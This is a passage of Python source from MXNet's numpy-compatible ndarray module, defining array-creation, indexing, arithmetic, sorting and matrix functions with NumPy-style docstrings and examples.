[2, 2]], dtype=int32)
"""
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
if isinstance(fill_value, NDArray):
if dtype is None:
ret = broadcast_to(fill_value, shape)
else:
ret = broadcast_to(fill_value, shape).astype(dtype)
return ret
dtype = _np.float32 if dtype is None else dtype
return _npi.full(shape=shape, value=fill_value, ctx=ctx, dtype=dtype, out=out)
# pylint: enable=too-many-arguments, redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def full_like(a, fill_value, dtype=None, order='C', ctx=None, out=None): # pylint: disable=too-many-arguments
"""
Return a full array with the same shape and type as a given array.
Parameters
----------
a : ndarray
The shape and data-type of `a` define these same attributes of
the returned array.
fill_value : scalar
Fill value.
dtype : data-type, optional
Overrides the data type of the result.
Temporarily do not support boolean type.
order : {'C'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. Currently only supports C order.
ctx: to specify the device, e.g. the i-th GPU.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Array of `fill_value` with the same shape and type as `a`.
See Also
--------
empty_like : Return an empty array with shape and type of input.
ones_like : Return an array of ones with shape and type of input.
zeros_like : Return an array of zeros with shape and type of input.
full : Return a new array of given shape filled with value.
Examples
--------
>>> x = np.arange(6, dtype=int)
>>> np.full_like(x, 1)
array([1, 1, 1, 1, 1, 1], dtype=int64)
>>> np.full_like(x, 0.1)
array([0, 0, 0, 0, 0, 0], dtype=int64)
>>> np.full_like(x, 0.1, dtype=np.float64)
array([0.1, 0.1, 0.1, 0.1, 0.1, 0.1], dtype=float64)
>>> np.full_like(x, np.nan, dtype=np.double)
array([nan, nan, nan, nan, nan, nan], dtype=float64)
>>> y = np.arange(6, dtype=np.float32)
>>> np.full_like(y, 0.1)
array([0.1, 0.1, 0.1, 0.1, 0.1, 0.1])
"""
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
return _npi.full_like(a, fill_value=fill_value, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def empty_like(prototype, dtype=None, order='C', subok=False, shape=None): # pylint: disable=W0621
"""
Return a new array with the same shape and type as a given array.
Parameters
----------
prototype : ndarray
The shape and data-type of `prototype` define these same attributes
of the returned array.
dtype : data-type, optional
Overrides the data type of the result.
order : {'C'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. Currently only supports C order.
subok : {False}, optional
If True, then the newly created array will use the sub-class
type of 'a', otherwise it will be a base-class array. Defaults
to False.
(Only support False at this moment)
shape : int or sequence of ints, optional.
Overrides the shape of the result. If order='K' and the number of
dimensions is unchanged, will try to keep order, otherwise,
order='C' is implied.
(Not supported at this moment)
Returns
-------
out : ndarray
Array of uninitialized (arbitrary) data with the same
shape and type as `prototype`.
See Also
--------
ones_like : Return an array of ones with shape and type of input.
zeros_like : Return an array of zeros with shape and type of input.
full_like : Return a new array with shape of input filled with value.
empty : Return a new uninitialized array.
Notes
-----
This function does *not* initialize the returned array; to do that use
`zeros_like` or `ones_like` instead. It may be marginally faster than
the functions that do set the array values.
Examples
--------
>>> a = np.array([[1,2,3], [4,5,6]])
>>> np.empty_like(a)
array([[-5764607523034234880, -2305834244544065442, 4563075075], # uninitialized
[ 4567052944, -5764607523034234880, 844424930131968]])
>>> a = np.array([[1., 2., 3.],[4.,5.,6.]])
>>> np.empty_like(a)
array([[4.9e-324, 9.9e-324, 1.5e-323], # uninitialized
[2.0e-323, 2.5e-323, 3.0e-323]])
"""
dtype_list = {None:'None', _np.int8:'int8', _np.uint8:'uint8', _np.int32:'int32',
_np.int64:'int64', _np.float16:'float16', _np.float32:'float32',
_np.float64:'float64', _np.bool_:'bool_', bool:'bool', int:'int64', float:'float64'}
if order != 'C':
raise NotImplementedError("Only support C-order at this moment")
if subok:
raise NotImplementedError("Creating array by using sub-class is not supported at this moment")
if shape is not None:
raise NotImplementedError("Assigning new shape is not supported at this moment")
try:
dtype = dtype if isinstance(dtype, str) else dtype_list[dtype]
except:
raise NotImplementedError("Do not support this dtype at this moment")
return _npi.empty_like_fallback(prototype, dtype=dtype, order=order, subok=subok, shape=shape)
@set_module('mxnet.ndarray.numpy')
def arange(start, stop=None, step=1, dtype=None, ctx=None):
"""Return evenly spaced values within a given interval.
Values are generated within the half-open interval ``[start, stop)``
(in other words, the interval including `start` but excluding `stop`).
For integer arguments the function is equivalent to the Python built-in
`range` function, but returns an ndarray rather than a list.
Parameters
----------
start : number, optional
Start of interval. The interval includes this value. The default
start value is 0.
stop : number
End of interval. The interval does not include this value, except
in some cases where `step` is not an integer and floating point
round-off affects the length of `out`.
step : number, optional
Spacing between values. For any output `out`, this is the distance
between two adjacent values, ``out[i+1] - out[i]``. The default
step size is 1. If `step` is specified as a position argument,
`start` must also be given.
dtype : dtype
The type of the output array. The default is `float32`.
Returns
-------
arange : ndarray
Array of evenly spaced values.
For floating point arguments, the length of the result is
``ceil((stop - start)/step)``. Because of floating point overflow,
this rule may result in the last element of `out` being greater
than `stop`.
"""
if dtype is None:
dtype = 'float32'
if ctx is None:
ctx = current_context()
if stop is None:
stop = start
start = 0
if step is None:
step = 1
if start is None and stop is None:
raise ValueError('start and stop cannot be both None')
if step == 0:
raise ZeroDivisionError('step cannot be 0')
return _npi.arange(start=start, stop=stop, step=step, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def identity(n, dtype=None, ctx=None):
"""
Return the identity array.
The identity array is a square array with ones on
the main diagonal.
Parameters
----------
n : int
Number of rows (and columns) in `n` x `n` output.
dtype : data-type, optional
Data-type of the output. Defaults to ``numpy.float32``.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray
`n` x `n` array with its main diagonal set to one,
and all other elements 0.
Examples
--------
>>> np.identity(3)
>>> np.identity(3)
array([[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]])
"""
if not isinstance(n, int):
raise TypeError("Input 'n' should be an integer")
if n < 0:
raise ValueError("Input 'n' cannot be negative")
if ctx is None:
ctx = current_context()
dtype = _np.float32 if dtype is None else dtype
return _npi.identity(shape=(n, n), ctx=ctx, dtype=dtype)
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def take(a, indices, axis=None, mode='raise', out=None):
r"""
Take elements from an array along an axis.
When axis is not None, this function does the same thing as "fancy"
indexing (indexing arrays using arrays); however, it can be easier to use
if you need elements along a given axis. A call such as
``np.take(arr, indices, axis=3)`` is equivalent to
``arr[:,:,:,indices,...]``.
Explained without fancy indexing, this is equivalent to the following use
of `ndindex`, which sets each of ``ii``, ``jj``, and ``kk`` to a tuple of
indices::
Ni, Nk = a.shape[:axis], a.shape[axis+1:]
Nj = indices.shape
for ii in ndindex(Ni):
for jj in ndindex(Nj):
for kk in ndindex(Nk):
out[ii + jj + kk] = a[ii + (indices[jj],) + kk]
Parameters
----------
a : ndarray
The source array.
indices : ndarray
The indices of the values to extract. Also allow scalars for indices.
axis : int, optional
The axis over which to select values. By default, the flattened
input array is used.
out : ndarray, optional
If provided, the result will be placed in this array. It should
be of the appropriate shape and dtype.
mode : {'clip', 'wrap'}, optional
Specifies how out-of-bounds indices will behave.
* 'clip' -- clip to the range (default)
* 'wrap' -- wrap around
'clip' mode means that all indices that are too large are replaced
by the index that addresses the last element along that axis. Note
that this disables indexing with negative numbers.
Returns
-------
out : ndarray
The returned array has the same type as `a`.
Notes
-----
This function differs from the original `numpy.take
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.take.html>`_ in
the following way(s):
- Only ndarray or scalar ndarray is accepted as valid input.
Examples
--------
>>> a = np.array([4, 3, 5, 7, 6, 8])
>>> indices = np.array([0, 1, 4])
>>> np.take(a, indices)
array([4., 3., 6.])
In this example for `a` is an ndarray, "fancy" indexing can be used.
>>> a[indices]
array([4., 3., 6.])
If `indices` is not one dimensional, the output also has these dimensions.
>>> np.take(a, np.array([[0, 1], [2, 3]]))
array([[4., 3.],
[5., 7.]])
"""
if mode not in ('wrap', 'clip', 'raise'):
raise NotImplementedError(
"function take does not support mode '{}'".format(mode))
if axis is None:
return _npi.take(_npi.reshape(a, -1), indices, 0, mode, out)
else:
return _npi.take(a, indices, axis, mode, out)
# pylint: enable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def insert(arr, obj, values, axis=None):
"""
Insert values along the given axis before the given indices.
Parameters
----------
arr : ndarray
Input array.
obj : int, slice or ndarray of int64
Object that defines the index or indices before which `values` is
inserted.
Support for multiple insertions when `obj` is a single scalar or a
sequence with one element (only support int32 and int64 element).
values : ndarray
Values to insert into `arr`.
If the type of values is different from that of arr, values is converted
to the type of arr.
axis : int, optional
Axis along which to insert `values`. If `axis` is None then `arr`
is flattened first.
Returns
-------
out : ndarray
A copy of `arr` with `values` inserted. Note that `insert`
does not occur in-place: a new array is returned. If
`axis` is None, `out` is a flattened array.
Notes
-----
- Note that for higher dimensional inserts `obj=0` behaves very different
from `obj=[0]` just like `arr[:,0,:] = values` is different from
`arr[:,[0],:] = values`.
- If obj is a ndarray, it's dtype only supports int64
Examples
--------
>>> a = np.array([[1, 1], [2, 2], [3, 3]])
>>> a
array([[1., 1.],
[2., 2.],
[3., 3.]])
>>> np.insert(a, 1, np.array(5))
array([1., 5., 1., 2., 2., 3., 3.])
>>> np.insert(a, 1, np.array(5), axis=1)
array([[1., 5., 1.],
[2., 5., 2.],
[3., 5., 3.]])
Difference between sequence and scalars:
>>> np.insert(a, np.array([1], dtype=np.int64), np.array([[1],[2],[3]]), axis=1)
array([[1., 1., 1.],
[2., 2., 2.],
[3., 3., 3.]])
>>> np.insert(a, 1, np.array([1, 2, 3]), axis=1)
array([[1., 1., 1.],
[2., 2., 2.],
[3., 3., 3.]])
>>> b = a.flatten()
>>> b
array([1., 1., 2., 2., 3., 3.])
>>> np.insert(b, np.array([2, 2], dtype=np.int64), np.array([5, 6]))
array([1., 1., 5., 6., 2., 2., 3., 3.])
>>> np.insert(b, slice(2, 4), np.array([5, 6]))
array([1., 1., 5., 2., 6., 2., 3., 3.])
# type casting
>>> np.insert(b.astype(np.int32), np.array([2, 2],dtype='int64'), np.array([7.13, False]))
array([1, 1, 7, 0, 2, 2, 3, 3], dtype=int32)
>>> x = np.arange(8).reshape(2, 4)
>>> idx = np.array([1, 3], dtype=np.int64)
>>> np.insert(x, idx, np.array([999]), axis=1)
array([[ 0., 999., 1., 2., 999., 3.],
[ 4., 999., 5., 6., 999., 7.]])
"""
if isinstance(values, numeric_types):
if isinstance(obj, slice):
start = obj.start
stop = obj.stop
step = 1 if obj.step is None else obj.step
return _npi.insert_slice(arr, val=values, start=start, stop=stop, step=step, axis=axis)
elif isinstance(obj, integer_types):
return _npi.insert_scalar(arr, val=values, int_ind=obj, axis=axis)
elif isinstance(obj, NDArray):
return _npi.insert_tensor(arr, obj, val=values, axis=axis)
if not isinstance(arr, NDArray):
raise TypeError("'arr' can not support type {}".format(str(type(arr))))
if not isinstance(values, NDArray):
raise TypeError("'values' can not support type {}".format(str(type(values))))
if isinstance(obj, slice):
start = obj.start
stop = obj.stop
step = 1 if obj.step is None else obj.step
return _npi.insert_slice(arr, values, start=start, stop=stop, step=step, axis=axis)
elif isinstance(obj, integer_types):
return _npi.insert_scalar(arr, values, int_ind=obj, axis=axis)
elif isinstance(obj, NDArray):
return _npi.insert_tensor(arr, values, obj, axis=axis)
else:
raise TypeError("'obj' can not support type {}".format(str(type(obj))))
#pylint: disable= too-many-arguments, no-member, protected-access
def _ufunc_helper(lhs, rhs, fn_array, fn_scalar, lfn_scalar, rfn_scalar=None, out=None):
""" Helper function for element-wise operation.
The function will perform numpy-like broadcasting if needed and call different functions.
Parameters
--------
lhs : ndarray or numeric value
Left-hand side operand.
rhs : ndarray or numeric value
Right-hand operand,
fn_array : function
Function to be called if both lhs and rhs are of ``ndarray`` type.
fn_scalar : function
Function to be called if both lhs and rhs are numeric values.
lfn_scalar : function
Function to be called if lhs is ``ndarray`` while rhs is numeric value
rfn_scalar : function
Function to be called if lhs is numeric value while rhs is ``ndarray``;
if none is provided, then the function is commutative, so rfn_scalar is equal to lfn_scalar
Returns
--------
mxnet.numpy.ndarray or scalar
result array or scalar
"""
from ...numpy import ndarray
if isinstance(lhs, numeric_types):
if isinstance(rhs, numeric_types):
return fn_scalar(lhs, rhs, out=out)
else:
if rfn_scalar is None:
# commutative function
return lfn_scalar(rhs, float(lhs), out=out)
else:
return rfn_scalar(rhs, float(lhs), out=out)
elif isinstance(rhs, numeric_types):
return lfn_scalar(lhs, float(rhs), out=out)
elif isinstance(rhs, ndarray):
return fn_array(lhs, rhs, out=out)
else:
raise TypeError('type {} not supported'.format(str(type(rhs))))
#pylint: enable= too-many-arguments, no-member, protected-access
@set_module('mxnet.ndarray.numpy')
def unique(ar, return_index=False, return_inverse=False, return_counts=False, axis=None):
"""
Find the unique elements of an array.
Returns the sorted unique elements of an array. There are three optional
outputs in addition to the unique elements:
* the indices of the input array that give the unique values
* the indices of the unique array that reconstruct the input array
* the number of times each unique value comes up in the input array
Parameters
----------
ar : ndarray
Input array. Unless `axis` is specified, this will be flattened if it
is not already 1-D.
return_index : bool, optional
If True, also return the indices of `ar` (along the specified axis,
if provided, or in the flattened array) that result in the unique array.
return_inverse : bool, optional
If True, also return the indices of the unique array (for the specified
axis, if provided) that can be used to reconstruct `ar`.
return_counts : bool, optional
If True, also return the number of times each unique item appears
in `ar`.
axis : int or None, optional
The axis to operate on. If None, `ar` will be flattened. If an integer,
the subarrays indexed by the given axis will be flattened and treated
as the elements of a 1-D array with the dimension of the given axis,
see the notes for more details. The default is None.
Returns
-------
unique : ndarray
The sorted unique values.
unique_indices : ndarray, optional
The indices of the first occurrences of the unique values in the
original array. Only provided if `return_index` is True.
unique_inverse : ndarray, optional
The indices to reconstruct the original array from the
unique array. Only provided if `return_inverse` is True.
unique_counts : ndarray, optional
The number of times each of the unique values comes up in the
original array. Only provided if `return_counts` is True.
Notes
-----
When an axis is specified the subarrays indexed by the axis are sorted.
This is done by making the specified axis the first dimension of the array
and then flattening the subarrays in C order. The flattened subarrays are
then viewed as a structured type with each element given a label, with the
effect that we end up with a 1-D array of structured types that can be
treated in the same way as any other 1-D array. The result is that the
flattened subarrays are sorted in lexicographic order starting with the
first element.
This function differs from the original `numpy.unique
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.unique.html>`_ in
the following aspects:
- Only support ndarray as input.
- Object arrays or structured arrays are not supported.
Examples
--------
>>> np.unique(np.array([1, 1, 2, 2, 3, 3]))
array([1., 2., 3.])
>>> a = np.array([[1, 1], [2, 3]])
>>> np.unique(a)
array([1., 2., 3.])
Return the unique rows of a 2D array
>>> a = np.array([[1, 0, 0], [1, 0, 0], [2, 3, 4]])
>>> np.unique(a, axis=0)
array([[1., 0., 0.],
[2., 3., 4.]])
Return the indices of the original array that give the unique values:
>>> a = np.array([1, 2, 6, 4, 2, 3, 2])
>>> u, indices = np.unique(a, return_index=True)
>>> u
array([1., 2., 3., 4., 6.])
>>> indices
array([0, 1, 5, 3, 2], dtype=int64)
>>> a[indices]
array([1., 2., 3., 4., 6.])
Reconstruct the input array from the unique values:
>>> a = np.array([1, 2, 6, 4, 2, 3, 2])
>>> u, indices = np.unique(a, return_inverse=True)
>>> u
array([1., 2., 3., 4., 6.])
>>> indices
array([0, 1, 4, 3, 1, 2, 1], dtype=int64)
>>> u[indices]
array([1., 2., 6., 4., 2., 3., 2.])
"""
ret = _npi.unique(ar, return_index, return_inverse, return_counts, axis)
if isinstance(ret, list):
return tuple(ret)
else:
return ret
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def add(x1, x2, out=None, **kwargs):
"""
Add arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be added. If x1.shape != x2.shape, they must be broadcastable to
a common shape (which may be the shape of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
add : ndarray or scalar
The sum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars.
Notes
-----
This operator now supports automatic type promotion. The resulting type will be determined
according to the following rules:
* If both inputs are of floating number types, the output is the more precise type.
* If only one of the inputs is floating number type, the result is that type.
* If both inputs are of integer types (including boolean), not supported yet.
"""
return _ufunc_helper(x1, x2, _npi.add, _np.add, _npi.add_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def subtract(x1, x2, out=None, **kwargs):
"""
Subtract arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be subtracted from each other. If x1.shape != x2.shape,
they must be broadcastable to a common shape (which may be the shape
of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
subtract : ndarray or scalar
The difference of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars.
Notes
-----
This operator now supports automatic type promotion. The resulting type will be determined
according to the following rules:
* If both inputs are of floating number types, the output is the more precise type.
* If only one of the inputs is floating number type, the result is that type.
* If both inputs are of integer types (including boolean), not supported yet.
"""
return _ufunc_helper(x1, x2, _npi.subtract, _np.subtract, _npi.subtract_scalar,
_npi.rsubtract_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def multiply(x1, x2, out=None, **kwargs):
"""
Multiply arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be multiplied. If x1.shape != x2.shape, they must be broadcastable to
a common shape (which may be the shape of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
The multiplication of x1 and x2, element-wise. This is a scalar if both x1 and x2
are scalars.
Notes
-----
This operator now supports automatic type promotion. The resulting type will be determined
according to the following rules:
* If both inputs are of floating number types, the output is the more precise type.
* If only one of the inputs is floating number type, the result is that type.
* If both inputs are of integer types (including boolean), not supported yet.
"""
return _ufunc_helper(x1, x2, _npi.multiply, _np.multiply, _npi.multiply_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def divide(x1, x2, out=None, **kwargs):
"""
Returns a true division of the inputs, element-wise.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
This is a scalar if both x1 and x2 are scalars.
Notes
-----
This operator now supports automatic type promotion. The resulting type will be determined
according to the following rules:
* If both inputs are of floating number types, the output is the more precise type.
* If only one of the inputs is floating number type, the result is that type.
* If both inputs are of integer types (including boolean), the output is of float32 type.
"""
return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar,
_npi.rtrue_divide_scalar, out)
@set_module('mxnet.ndarray.numpy')
def true_divide(x1, x2, out=None):
"""Returns a true division of the inputs, element-wise.
Instead of the Python traditional 'floor division', this returns a true
division. True division adjusts the output type to present the best
answer, regardless of input types.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
This is a scalar if both x1 and x2 are scalars.
Notes
-----
This operator now supports automatic type promotion. The resulting type will be determined
according to the following rules:
* If both inputs are of floating number types, the output is the more precise type.
* If only one of the inputs is floating number type, the result is that type.
* If both inputs are of integer types (including boolean), the output is of float32 type.
"""
return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar,
_npi.rtrue_divide_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def mod(x1, x2, out=None, **kwargs):
"""
Return element-wise remainder of division.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
This is a scalar if both x1 and x2 are scalars.
"""
return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out)
@set_module('mxnet.ndarray.numpy')
def delete(arr, obj, axis=None):
"""
Return a new array with sub-arrays along an axis deleted. For a one
dimensional array, this returns those entries not returned by
`arr[obj]`.
Parameters
----------
arr : ndarray
Input array.
obj : slice, int or ndarray of ints
Indicate indices of sub-arrays to remove along the specified axis.
axis : int, optional
The axis along which to delete the subarray defined by `obj`.
If `axis` is None, `obj` is applied to the flattened array.
Returns
-------
out : ndarray
A copy of `arr` with the elements specified by `obj` removed. Note
that `delete` does not occur in-place. If `axis` is None, `out` is
a flattened array.
Examples
--------
>>> arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
>>> arr
array([[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]])
>>> np.delete(arr, 1, 0)
array([[ 1., 2., 3., 4.],
[ 9., 10., 11., 12.]])
>>> np.delete(arr, slice(None, None, 2), 1)
array([[ 2., 4.],
[ 6., 8.],
[10., 12.]])
>>> np.delete(arr, np.array([1,3,5]), None)
array([ 1., 3., 5., 7., 8., 9., 10., 11., 12.])
>>> np.delete(arr, np.array([1,1,5]), None)
array([ 1., 3., 4., 5., 7., 8., 9., 10., 11., 12.])
"""
if not isinstance(arr, NDArray):
raise TypeError("'arr' can not support type {}".format(str(type(arr))))
if isinstance(obj, slice):
start = obj.start
stop = obj.stop
step = 1 if obj.step is None else obj.step
return _npi.delete(arr, start=start, stop=stop, step=step, axis=axis)
elif isinstance(obj, integer_types):
return _npi.delete(arr, int_ind=obj, axis=axis)
elif isinstance(obj, NDArray):
return _npi.delete(arr, obj, axis=axis)
else:
raise TypeError("'obj' can not support type {}".format(str(type(obj))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def matmul(a, b, out=None):
"""
Matrix product of two arrays.
Parameters
----------
a, b : ndarray
Input arrays, scalars not allowed.
out : ndarray, optional
A location into which the result is stored.
If provided, it must have a shape that matches the signature (n,k),(k,m)->(n,m).
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The matrix product of the inputs.
This is a scalar only when both x1, x2 are 1-d vectors.
Raises
------
MXNetError
If the last dimension of a is not the same size as the second-to-last dimension of b.
If a scalar value is passed in.
See Also
--------
tensordot :
Sum products over arbitrary axes.
dot :
alternative matrix product with different broadcasting rules.
einsum :
Einstein summation convention.
Notes
-----
The behavior depends on the arguments in the following way.
- If both arguments are 2-D they are multiplied like conventional matrices.
- If either argument is N-D, N > 2, it is treated as a stack of matrices
residing in the last two indexes and broadcast accordingly.
- If the first argument is 1-D, it is promoted to a matrix by prepending
a 1 to its dimensions. After matrix multiplication the prepended 1 is removed.
- If the second argument is 1-D, it is promoted to a matrix by appending a 1
to its dimensions. After matrix multiplication the appended 1 is removed.
matmul differs from dot in two important ways:
- Multiplication by scalars is not allowed, use multiply instead.
- Stacks of matrices are broadcast together as if the matrices were elements,
respecting the signature (n,k),(k,m)->(n,m):
>>> a = np.ones([9, 5, 7, 4])
>>> c = np.ones([9, 5, 4, 3])
>>> np.dot(a, c).shape
(9, 5, 7, 9, 5, 3)
>>> np.matmul(a, c).shape
(9, 5, 7, 3)
>>> # n is 7, k is 4, m is 3
Examples
--------
For 2-D arrays it is the matrix product:
>>> a = np.array([[1, 0],
... [0, 1]])
>>> b = np.array([[4, 1],
... [2, 2]])
>>> np.matmul(a, b)
array([[4., 1.],
[2., 2.]])
For 2-D mixed with 1-D, the result is the usual.
>>> a = np.array([[1, 0],
... [0, 1]])
>>> b = np.array([1, 2])
>>> np.matmul(a, b)
array([1., 2.])
>>> np.matmul(b, a)
array([1., 2.])
Broadcasting is conventional for stacks of arrays
>>> a = np.arange(2 * 2 * 4).reshape((2, 2, 4))
>>> b = np.arange(2 * 2 * 4).reshape((2, 4, 2))
>>> np.matmul(a, b).shape
(2, 2, 2)
>>> np.matmul(a, b)[0, 1, 1]
array(98.)
>>> sum(a[0, 1, :] * b[0, :, 1])
array(98.)
Scalar multiplication raises an error.
>>> np.matmul([1, 2], 3)
Traceback (most recent call last):
...
mxnet.base.MXNetError: ... : Multiplication by scalars is not allowed.
"""
return _npi.matmul(a, b, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def remainder(x1, x2, out=None):
"""
Return element-wise remainder of division.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
This is a scalar if both x1 and x2 are scalars.
"""
return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def power(x1, x2, out=None, **kwargs):
"""
First array elements raised to powers from second array, element-wise.
Parameters
----------
x1 : ndarray or scalar
The bases.
x2 : ndarray or scalar
The exponent.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
The bases in x1 raised to the exponents in x2.
This is a scalar if both x1 and x2 are scalars.
"""
return _ufunc_helper(x1, x2, _npi.power, _np.power, _npi.power_scalar, _npi.rpower_scalar, out)
@set_module('mxnet.ndarray.numpy')
def argsort(a, axis=-1, kind=None, order=None):
"""
Returns the indices that would sort an array.
Perform an indirect sort along the given axis using the algorithm specified
by the `kind` keyword. It returns an array of indices of the same shape as
`a` that index data along the given axis in sorted order.
Parameters
----------
a : ndarray
Array to sort.
axis : int or None, optional
Axis along which to sort. The default is -1 (the last axis). If None,
the flattened array is used.
kind : string, optional
This argument can take any string, but it does not have any effect on the
final result.
order : str or list of str, optional
Not supported yet, will raise NotImplementedError if not None.
Returns
-------
index_array : ndarray, int
Array of indices that sort `a` along the specified `axis`.
If `a` is one-dimensional, ``a[index_array]`` yields a sorted `a`.
More generally, ``np.take_along_axis(a, index_array, axis=axis)``
always yields the sorted `a`, irrespective of dimensionality.
Notes
-----
This operator does not support different sorting algorithms.
Examples
--------
One dimensional array:
>>> x = np.array([3, 1, 2])
>>> np.argsort(x)
array([1, 2, 0])
Two-dimensional array:
>>> x = np.array([[0, 3], [2, 2]])
>>> x
array([[0, 3],
[2, 2]])
>>> ind = np.argsort(x, axis=0) # sorts along first axis (down)
>>> ind
array([[0, 1],
[1, 0]])
>>> np.take_along_axis(x, ind, axis=0) # same as np.sort(x, axis=0)
array([[0, 2],
[2, 3]])
>>> ind = np.argsort(x, axis=1) # sorts along last axis (across)
>>> ind
array([[0, 1],
[0, 1]])
>>> np.take_along_axis(x, ind, axis=1) # same as np.sort(x, axis=1)
array([[0, 3],
[2, 2]])
Indices of the sorted elements of a N-dimensional array:
>>> ind = np.unravel_index(np.argsort(x, axis=None), x.shape)
>>> ind
(array([0, 1, 1, 0]), array([0, 0, 1, 1]))
>>> x[ind] # same as np.sort(x, axis=None)
array([0, 2, 2, 3])
"""
if order is not None:
raise NotImplementedError("order not supported here")
return _npi.argsort(data=a, axis=axis, is_ascend=True, dtype='int64')
@set_module('mxnet.ndarray.numpy')
def sort(a, axis=-1, kind=None, order=None):
"""
Return a sorted copy of an array.
Parameters
----------
a : ndarray
Array to be sorted.
axis : int or None, optional
Axis along which to sort. The default is -1 (the last axis). If None,
the flattened array is used.
kind : string, optional
This argument can take any string, but it does not have any effect on the
final result.
order : str or list of str, optional
Not supported yet, will raise NotImplementedError if not None.
Returns
-------
sorted_array : ndarray
Array of the same type and shape as `a`.
Notes
-----
This operator does not support different sorting algorithms.
Examples
--------
>>> a = np.array([[1,4],[3,1]])
>>> np.sort(a) # sort along the last axis
array([[1, 4],
[1, 3]])
>>> np.sort(a, axis=None) # sort the flattened array
array([1, 1, 3, 4])
>>> np.sort(a, axis=0) # sort along the first axis
array([[1, 1],
[3, 4]])
"""
if order is not None:
raise NotImplementedError("order not supported here")
return _npi.sort(data=a, axis=axis, is_ascend=True)
@set_module('mxnet.ndarray.numpy')
def tensordot(a, b, axes=2):
r"""
tensordot(a, b, axes=2)
Compute tensor dot product along specified axes for arrays >= 1-D.
Given two tensors (arrays of dimension greater than or equal to one),
`a` and `b`, and an ndarray object containing two ndarray
objects, ``(a_axes, b_axes)``, sum the products of `a`'s and `b`'s
elements (components) over the axes specified by ``a_axes`` and
``b_axes``. The third argument can be a single non-negative
integer_like scalar, ``N``; if it is such, then the last ``N``
dimensions of `a` and the first ``N`` dimensions of `b` are summed
over.
Parameters
----------
a, b : ndarray, len(shape) >= 1
Tensors to "dot".
axes : int or (2,) ndarray
* integer_like
If an int N, sum over the last N axes of `a` and the first N axes
of `b` in order. The sizes of the corresponding axes must match.
* (2,) ndarray
Or, a list of axes to be summed over, first sequence applying to `a`,
second to `b`. Both elements ndarray must be of the same length.
See Also
--------
dot, einsum
Notes
-----
Three common use cases are:
* ``axes = 0`` : tensor product :math:`a\otimes b`
* ``axes = 1`` : tensor dot product :math:`a\cdot b`
* ``axes = 2`` : (default) tensor double contraction :math:`a:b`
When `axes` is integer_like, the sequence for evaluation will be: first
the -Nth axis in `a` and 0th axis in `b`, and the -1th axis in `a` and
Nth axis in `b` last.
When there is more than one axis to sum over - and they are not the last
(first) axes of `a` (`b`) - the argument `axes` should consist of
two sequences of the same length, with the first axis to sum over given
first in both sequences, the second axis second, and so forth.
Examples
